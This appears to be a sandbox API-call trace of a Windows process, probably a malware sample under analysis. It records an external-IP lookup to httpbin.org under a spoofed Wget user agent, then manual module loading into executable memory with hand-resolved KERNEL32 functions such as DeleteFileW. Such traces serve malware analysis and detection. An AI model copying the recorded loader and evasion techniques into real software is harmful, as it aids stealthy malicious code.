dwMilliseconds=0x7530) returned 0x0 [0045.832] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0045.832] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0045.832] ResetEvent (hEvent=0x230) returned 1 [0045.832] ResetEvent (hEvent=0x234) returned 1 [0045.832] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0046.067] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0046.067] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0046.067] ResetEvent (hEvent=0x230) returned 1 [0046.067] ResetEvent (hEvent=0x234) returned 1 [0046.068] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0046.340] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0046.340] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0046.340] ResetEvent (hEvent=0x230) returned 1 [0046.340] ResetEvent (hEvent=0x234) returned 1 [0046.340] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0046.623] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0046.623] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0046.623] ResetEvent (hEvent=0x230) returned 1 [0046.623] ResetEvent (hEvent=0x234) returned 1 [0046.623] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0047.087] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0047.087] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0047.087] ResetEvent (hEvent=0x230) returned 1 [0047.087] ResetEvent (hEvent=0x234) returned 1 [0047.087] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0047.323] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0047.323] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0047.323] ResetEvent (hEvent=0x230) returned 1 [0047.323] ResetEvent (hEvent=0x234) returned 1 [0047.323] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0047.591] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0047.591] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0047.591] ResetEvent (hEvent=0x230) returned 1 [0047.591] ResetEvent (hEvent=0x234) returned 1 [0047.591] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0047.878] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0047.878] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0047.878] ResetEvent (hEvent=0x230) returned 1 [0047.878] ResetEvent (hEvent=0x234) returned 1 [0047.878] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0048.149] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0048.149] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0048.149] ResetEvent (hEvent=0x230) returned 1 [0048.149] ResetEvent (hEvent=0x234) returned 1 [0048.149] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0078.151] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0078.151] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0078.151] ResetEvent (hEvent=0x230) returned 1 [0078.151] ResetEvent (hEvent=0x234) returned 1 [0078.151] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0078.387] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0078.387] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0078.387] ResetEvent (hEvent=0x230) returned 1 [0078.387] ResetEvent (hEvent=0x234) returned 1 [0078.387] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0078.658] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0078.658] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0078.659] ResetEvent (hEvent=0x230) returned 1 [0078.659] ResetEvent (hEvent=0x234) returned 1 [0078.659] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0078.893] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0078.893] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0078.893] ResetEvent (hEvent=0x230) returned 1 [0078.893] ResetEvent (hEvent=0x234) returned 1 [0078.893] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0079.159] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0079.159] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0079.159] ResetEvent (hEvent=0x230) returned 1 [0079.159] ResetEvent (hEvent=0x234) returned 1 [0079.159] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0079.394] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0079.394] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0079.394] ResetEvent (hEvent=0x230) returned 1 [0079.394] ResetEvent (hEvent=0x234) returned 1 [0079.394] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0079.629] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0079.629] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0079.629] ResetEvent (hEvent=0x230) returned 1 [0079.629] ResetEvent (hEvent=0x234) returned 1 [0079.629] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0080.030] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0080.030] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0080.030] ResetEvent (hEvent=0x230) returned 1 [0080.030] ResetEvent (hEvent=0x234) returned 1 [0080.030] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0080.267] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0080.267] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0080.267] ResetEvent (hEvent=0x230) returned 1 [0080.267] ResetEvent (hEvent=0x234) returned 1 [0080.267] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0080.501] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0080.501] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0080.501] ResetEvent (hEvent=0x230) returned 1 [0080.501] ResetEvent (hEvent=0x234) returned 1 [0080.501] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0080.735] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0080.735] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0080.735] ResetEvent (hEvent=0x230) returned 1 [0080.735] ResetEvent (hEvent=0x234) returned 1 [0080.735] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0080.971] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0080.971] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0080.971] ResetEvent (hEvent=0x230) returned 1 [0080.971] ResetEvent (hEvent=0x234) returned 1 [0080.971] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0081.526] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0081.526] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0081.526] ResetEvent (hEvent=0x230) returned 1 [0081.526] ResetEvent (hEvent=0x234) returned 1 [0081.526] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0082.463] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0082.463] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0082.463] ResetEvent (hEvent=0x230) returned 1 [0082.463] ResetEvent (hEvent=0x234) returned 1 [0082.463] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0082.696] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0082.696] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0082.696] ResetEvent (hEvent=0x230) returned 1 [0082.697] ResetEvent (hEvent=0x234) returned 1 [0082.697] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0082.931] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0082.931] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0082.931] ResetEvent (hEvent=0x230) returned 1 [0082.931] ResetEvent (hEvent=0x234) returned 1 [0082.931] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0083.166] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0083.166] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0083.166] ResetEvent (hEvent=0x230) returned 1 [0083.166] ResetEvent (hEvent=0x234) returned 1 [0083.166] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0083.460] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0083.460] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0083.460] ResetEvent (hEvent=0x230) returned 1 [0083.460] ResetEvent (hEvent=0x234) returned 1 [0083.460] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0083.694] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0083.694] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0083.694] ResetEvent (hEvent=0x230) returned 1 [0083.694] ResetEvent (hEvent=0x234) returned 1 [0083.694] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0083.929] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0083.929] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0083.929] ResetEvent (hEvent=0x230) returned 1 [0083.929] ResetEvent (hEvent=0x234) returned 1 [0083.929] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0084.163] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0084.163] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0084.163] ResetEvent (hEvent=0x230) returned 1 [0084.163] ResetEvent (hEvent=0x234) returned 1 [0084.163] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0084.398] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0084.398] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0084.398] ResetEvent (hEvent=0x230) returned 1 [0084.398] ResetEvent (hEvent=0x234) returned 1 [0084.398] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0084.632] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0084.632] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0084.632] ResetEvent (hEvent=0x230) returned 1 [0084.632] ResetEvent (hEvent=0x234) returned 1 [0084.632] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0084.867] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0084.868] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0084.868] ResetEvent (hEvent=0x230) returned 1 [0084.868] ResetEvent (hEvent=0x234) returned 1 [0084.868] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0085.101] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0085.101] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0085.101] ResetEvent (hEvent=0x230) returned 1 [0085.102] ResetEvent (hEvent=0x234) returned 1 [0085.102] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0085.337] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0085.337] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0085.337] ResetEvent (hEvent=0x230) returned 1 [0085.337] ResetEvent (hEvent=0x234) returned 1 [0085.337] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0085.571] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0085.571] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0085.571] ResetEvent (hEvent=0x230) returned 1 [0085.571] ResetEvent (hEvent=0x234) returned 1 [0085.571] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0085.806] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0085.806] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0085.806] ResetEvent (hEvent=0x230) returned 1 [0085.806] ResetEvent (hEvent=0x234) returned 1 [0085.806] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0086.040] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0086.040] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0086.040] ResetEvent (hEvent=0x230) returned 1 [0086.040] ResetEvent (hEvent=0x234) returned 1 [0086.040] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0086.274] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0086.274] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0086.274] ResetEvent (hEvent=0x230) returned 1 [0086.274] ResetEvent (hEvent=0x234) returned 1 [0086.274] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0086.508] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0086.508] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0086.508] ResetEvent (hEvent=0x230) returned 1 [0086.508] ResetEvent (hEvent=0x234) returned 1 [0086.508] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0086.744] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0086.744] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0086.744] ResetEvent (hEvent=0x230) returned 1 [0086.744] ResetEvent (hEvent=0x234) returned 1 [0086.744] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0086.979] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0086.979] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0086.979] ResetEvent (hEvent=0x230) returned 1 [0086.979] ResetEvent (hEvent=0x234) returned 1 [0086.979] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0087.368] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0087.368] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0087.368] ResetEvent (hEvent=0x230) returned 1 [0087.368] ResetEvent (hEvent=0x234) returned 1 [0087.368] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0087.603] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0087.603] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0087.603] ResetEvent (hEvent=0x230) returned 1 [0087.603] ResetEvent (hEvent=0x234) returned 1 [0087.603] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0087.837] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0087.837] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0087.837] ResetEvent (hEvent=0x230) returned 1 [0087.837] ResetEvent (hEvent=0x234) returned 1 [0087.837] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0088.135] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0088.135] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0088.135] ResetEvent (hEvent=0x230) returned 1 [0088.135] ResetEvent (hEvent=0x234) returned 1 [0088.135] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0088.374] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0088.374] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0088.374] ResetEvent (hEvent=0x230) returned 1 [0088.374] ResetEvent (hEvent=0x234) returned 1 [0088.374] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0088.609] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0088.609] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0088.609] ResetEvent (hEvent=0x230) returned 1 [0088.609] ResetEvent (hEvent=0x234) returned 1 [0088.609] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0088.845] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0088.845] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0088.845] ResetEvent (hEvent=0x230) returned 1 [0088.845] ResetEvent (hEvent=0x234) returned 1 [0088.845] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0089.078] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0089.078] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0089.078] ResetEvent (hEvent=0x230) returned 1 [0089.078] ResetEvent (hEvent=0x234) returned 1 [0089.078] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) returned 0x0 [0089.776] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x102 [0089.776] WaitForSingleObject (hHandle=0x230, dwMilliseconds=0x0) returned 0x0 [0089.776] ResetEvent (hEvent=0x230) returned 1 [0089.776] ResetEvent (hEvent=0x234) returned 1 [0089.776] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x7530) Thread: id = 40 os_tid = 0xacc [0044.594] WinHttpOpen (pszAgentW="Wget/1.11.", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2c4f578 [0044.631] WinHttpConnect (hSession=0x2c4f578, pswzServerName="httpbin.org", nServerPort=0x50, dwReserved=0x0) returned 0x2dac5d8 [0044.643] strlen (_Str="https") returned 0x5 [0044.643] WinHttpOpenRequest (hConnect=0x2dac5d8, pwszVerb="GET", pwszObjectName="/ip", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x140) returned 0x2dac6c0 [0044.644] strlen (_Str="https") returned 0x5 [0044.644] WinHttpSendRequest (in: hRequest=0x2dac6c0, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0 | out: lpOptional=0x0*) returned 1 [0046.370] WinHttpReceiveResponse (hRequest=0x2dac6c0, lpReserved=0x0) returned 1 [0046.371] WinHttpQueryDataAvailable (in: hRequest=0x2dac6c0, lpdwNumberOfBytesAvailable=0x552ff70 | out: lpdwNumberOfBytesAvailable=0x552ff70*=0x21) returned 1 [0046.371] WinHttpReadData (in: hRequest=0x2dac6c0, lpBuffer=0x2618290, dwNumberOfBytesToRead=0x21, lpdwNumberOfBytesRead=0x552ff5c | out: lpBuffer=0x2618290*, lpdwNumberOfBytesRead=0x552ff5c*=0x21) returned 1 [0046.371] WinHttpQueryDataAvailable (in: hRequest=0x2dac6c0, lpdwNumberOfBytesAvailable=0x552ff70 | out: lpdwNumberOfBytesAvailable=0x552ff70*=0x0) returned 1 [0046.372] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0x0) returned 0x102 [0046.372] GetCurrentThreadId () returned 0xacc [0046.372] GetCurrentThreadId () returned 0xacc [0046.372] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x278 [0046.372] PostQueuedCompletionStatus (CompletionPort=0x1e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620cb4) returned 1 [0046.372] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0x7530) returned 0x0 [0046.372] CloseHandle (hObject=0x278) returned 1 [0046.372] WinHttpCloseHandle (hInternet=0x2dac6c0) returned 1 [0046.372] WinHttpCloseHandle (hInternet=0x2dac5d8) returned 1 [0046.372] WinHttpCloseHandle (hInternet=0x2c4f578) returned 1 [0046.373] CloseHandle (hObject=0x244) returned 1 Thread: id = 41 os_tid = 0xad0 Thread: id = 42 os_tid = 0xad4 Thread: id = 43 os_tid = 0xad8 [0047.323] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.323] GetCurrentThreadId () returned 0xad8 [0047.323] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 0 [0047.323] GetLastError () returned 0x3e5 [0047.323] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.323] GetCurrentThreadId () returned 0xad8 [0047.323] WriteFile (in: hFile=0x260, lpBuffer=0x26059b0, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2642688 | out: lpBuffer=0x26059b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2642688) returned 0 [0047.323] GetLastError () returned 0x3e5 [0047.323] SetEvent (hEvent=0x274) returned 1 [0047.324] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.324] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.324] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 1 [0047.324] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.324] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 1 [0047.324] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.325] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 1 [0047.325] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.325] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 1 [0047.325] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.325] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 1 [0047.325] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.325] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 1 [0047.325] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.325] strlen (_Str="get_info") returned 0x8 [0047.325] RtlImageNtHeader (BaseAddress=0x2647758) returned 0x2647850 [0047.325] VirtualAlloc (lpAddress=0x0, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x1c90000 [0047.327] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76600000 [0047.328] GetProcAddress (hModule=0x76600000, lpProcName="CreateDirectoryW") returned 0x76614259 [0047.328] GetProcAddress (hModule=0x76600000, lpProcName="WideCharToMultiByte") returned 0x7661170d [0047.328] GetProcAddress (hModule=0x76600000, lpProcName="MultiByteToWideChar") returned 0x7661192e [0047.328] GetProcAddress (hModule=0x76600000, lpProcName="VerSetConditionMask") returned 0x76fe92b9 [0047.328] GetProcAddress (hModule=0x76600000, lpProcName="VerifyVersionInfoA") returned 0x7662f803 [0047.328] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleHandleA") returned 0x76611245 [0047.328] GetProcAddress (hModule=0x76600000, lpProcName="GetProcAddress") returned 0x76611222 [0047.329] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcess") returned 0x76611809 [0047.329] GetProcAddress (hModule=0x76600000, lpProcName="lstrlenA") returned 0x76615a4b [0047.329] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemDirectoryW") returned 0x76615063 [0047.329] GetProcAddress (hModule=0x76600000, lpProcName="GetVolumeInformationW") returned 0x7662c860 [0047.329] GetProcAddress (hModule=0x76600000, lpProcName="GetFileInformationByHandle") returned 0x766153ae [0047.329] GetProcAddress (hModule=0x76600000, lpProcName="FindFirstFileW") returned 0x76614435 [0047.329] GetProcAddress (hModule=0x76600000, lpProcName="FindNextFileW") returned 0x766154ee [0047.330] GetProcAddress (hModule=0x76600000, lpProcName="FindClose") returned 0x76614442 [0047.330] GetProcAddress (hModule=0x76600000, lpProcName="RemoveDirectoryW") returned 0x766944cf [0047.330] GetProcAddress (hModule=0x76600000, lpProcName="DeleteFileW") returned 0x766189b3 [0047.330] GetProcAddress (hModule=0x76600000, lpProcName="EnterCriticalSection") returned 